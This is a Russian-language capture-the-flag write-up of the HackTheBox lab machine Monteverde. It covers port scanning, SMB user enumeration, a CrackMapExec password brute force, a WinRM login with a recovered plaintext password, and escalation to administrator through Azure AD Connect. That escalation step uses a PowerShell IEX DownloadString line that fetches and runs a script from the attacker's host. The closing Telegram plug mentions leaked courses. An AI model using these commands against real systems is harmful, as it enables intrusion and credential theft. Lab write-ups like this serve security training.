![image](https://habrastorage.org/webt/2m/jp/6q/2mjp6qqz5acr6edjuiddifkccba.png)
Продолжаю публикацию решений отправленных на дорешивание машин с площадки HackTheBox.
В данной статье брутфорсим пароль от SMB и повышаем привилегии до администратора от имени члена группы Azure Admins.
Подключение к лаборатории осуществляется через VPN. Рекомендуется не подключаться с рабочего компьютера или с хоста, где имеются важные для вас данные, так как Вы попадаете в частную сеть с людьми, которые что-то да умеют в области ИБ :)
Организационная информация
Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.
Recon
Данная машина имеет IP адрес 10.10.10.172, который я добавляю в /etc/hosts.
10.10.10.172 monteverde.htb
Первым делом сканируем открытые порты. Так как сканировать все порты nmap’ом долго, то я сначала сделаю это с помощью masscan. Мы сканируем все TCP и UDP порты с интерфейса tun0 со скоростью 500 пакетов в секунду.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.172 --rate=500
![image](https://habrastorage.org/webt/yp/hs/eu/yphseupjfeatcziqzpsdtm6ibdk.png)
На хосте открыто много портов. Теперь просканируем их с помощью nmap, чтобы отфильтровать и выбрать нужные.
nmap monteverde.htb -p49778,88,593,49667,53,445,5985,49675,9389,3268,49706,389,464,49674,139,636,135,3269,49673
![image](https://habrastorage.org/webt/9s/nm/af/9snmafnjta1vi4pimoszjcrkuna.png)
Теперь для получения более подробной информации о сервисах, которые работают на портах, запустим сканирование с опцией -А.
nmap -A monteverde.htb -p88,593,53,445,5985,9389,3268,389,464,139,636,135,3269
![image](https://habrastorage.org/webt/rt/sl/ls/rtsllshrzwl12ltl_fvtthege_o.png)
Первым делом проверяем SMB. Сделаем это с помощью enum4linux. Так мы получим пользователей, а также членство их в группа.
enum4linux -a monteverde.htb
![image](https://habrastorage.org/webt/i1/fs/_e/i1fs_egwv74fjcmdeyl289hvxzu.png)
![image](https://habrastorage.org/webt/wk/p-/vt/wkp-vtupeimqujldarc0-asqtje.png)
USER
Как обычно, пока мы ищем точку входа, одновременно брутфорсим пароли. Так как парольная политика ставит минимальное количество символов в пароле — 7, составим следующие списки.
![image](https://habrastorage.org/webt/ej/fy/cs/ejfycsenpvvgxdrzyld_uglz3iw.png)
![image](https://habrastorage.org/webt/as/uq/ha/asuqhaidrv20psgmiznpzi9n_bq.png)
А теперь запустим брут с помощью CrackMapExec.
cme smb monteverde.htb -u ./users.txt -p ./passwords.txt
![image](https://habrastorage.org/webt/sz/9u/ds/sz9udsiuuzkyp-hqwq-ybfnaw1q.png)
И на удивление, это увенчалось успехом — мы нашли учетные данные пользователя. Посмотрим доступные пользователю ресурсы.
cme smb monteverde.htb -u SABatchJobs -p SABatchJobs --shares
![image](https://habrastorage.org/webt/j7/vb/gt/j7vbgtgwfxct1jtd3futqhj1uqq.png)
И обратимся к ресурсу users$.
smbclient -U SABatchJobs%SABatchJobs //10.10.10.172/users$
![image](https://habrastorage.org/webt/hk/ya/fy/hkyafylcwfw3myg_dygntrjkfse.png)
Давайте рекурсивно посмотрим все файлы на сервере.
![image](https://habrastorage.org/webt/2h/yz/5o/2hyz5omvy1cgspc_npsoelyavui.png)
И посмотрим, что в файле.
![image](https://habrastorage.org/webt/uh/-w/qi/uh-wqiidqdkvoxrlfxfpoivwtre.png)
Теперь подключаемся к WinRM и забираем флаг пользователя.
evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
![image](https://habrastorage.org/webt/r5/tq/bn/r5tqbnh4qqmfz_lgu8ydkjsyty8.png)
ROOT
Посмотрим информацию о пользователе.
![image](https://habrastorage.org/webt/ek/6g/qb/ek6gqb9-9_eba2lx6cbovpucwoe.png)
Он состоит в группе Azure Admins — это вектор LPE. Используем Azure-ADConnect для подключения к базе Azure. Загружаем скрипт с локального сервера в память на удаленной машине и выполняем.
IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.60/Azure-ADConnect.ps1')
Azure-ADConnect -server 127.0.0.1 -db ADSync
![image](https://habrastorage.org/webt/6h/gx/jy/6hgxjyx9ldw_agzi7alx5wqedc0.png)
Получаем учетные данные администратора. Подключаемся и забираем флаг.
![image](https://habrastorage.org/webt/z6/mq/yp/z6mqypiofscgatdbad9rogrjero.png)
Имеем полный контроль над машиной.
Вы можете присоединиться к нам в Telegram. Там можно будет найти интересные материалы, слитые курсы, а также ПО. Давайте соберем сообщество, в котором будут люди, разбирающиеся во многих сферах ИТ, тогда мы всегда сможем помочь друг другу по любым вопросам ИТ и ИБ.